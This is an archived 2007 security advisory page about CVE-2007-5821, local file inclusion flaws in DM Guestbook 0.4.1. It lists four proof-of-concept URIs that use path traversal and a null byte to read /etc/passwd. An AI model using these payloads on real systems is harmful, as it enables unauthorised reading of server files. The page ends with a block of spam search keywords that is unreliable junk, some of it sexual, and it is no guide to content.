about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , DM Guestbook Multiple Local File Include Vulnerabilities


Title DM Guestbook Multiple Local File Include Vulnerabilities
Published 2007-11-02-12:00AM
Updated 2007-11-15-12:37AM
Class Input Validation Error
CVE   CVE-2007-5821
Remote  Yes
Local  No
Credit   GoLd_M is credited with the discovery of these vulnerabilities.
Vulnerable  DM Guestbook 0.4.1
Not Vulnerable  
Code  Attackers may exploit these issues through a browser.The following proof-of-concept URIs are available:http://www.example.com/guestbook.php?lng=../../../../../../../etc/passwd%00
http://www.example.com/admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00
http://www.example.com/auto/glob_new.php?lng=../../../../../../../etc/passwd%00
http://www.example.com/auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 10 Dec 2009 22:20:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sax girl Tagger LE VBulletin news for c blacksex.c dowlnload hot sada f 200 /compo com_phpsho privilege sexy.movie GIRLS.SEXY Www.tamilm FREE SEX T userland grl Free india cheap+ram saxy site www sexma garmanmove www.tomyqq 200 /compo Tagger LE Home poker www,sex,co Dogs apache mod Powered by 200 /compo squid 2.5 wwwsoon18. Www.sex.vi Nakedbaby lolywood.s KRAV MAGA aix 5.1 200 /compo WWW.PLEY B www.pk sex www.gay.co Remote Fi www.988.jx Moodle &am Searching php-nuke+2 php-nuke 2 200 /compo symantec a kitrina ka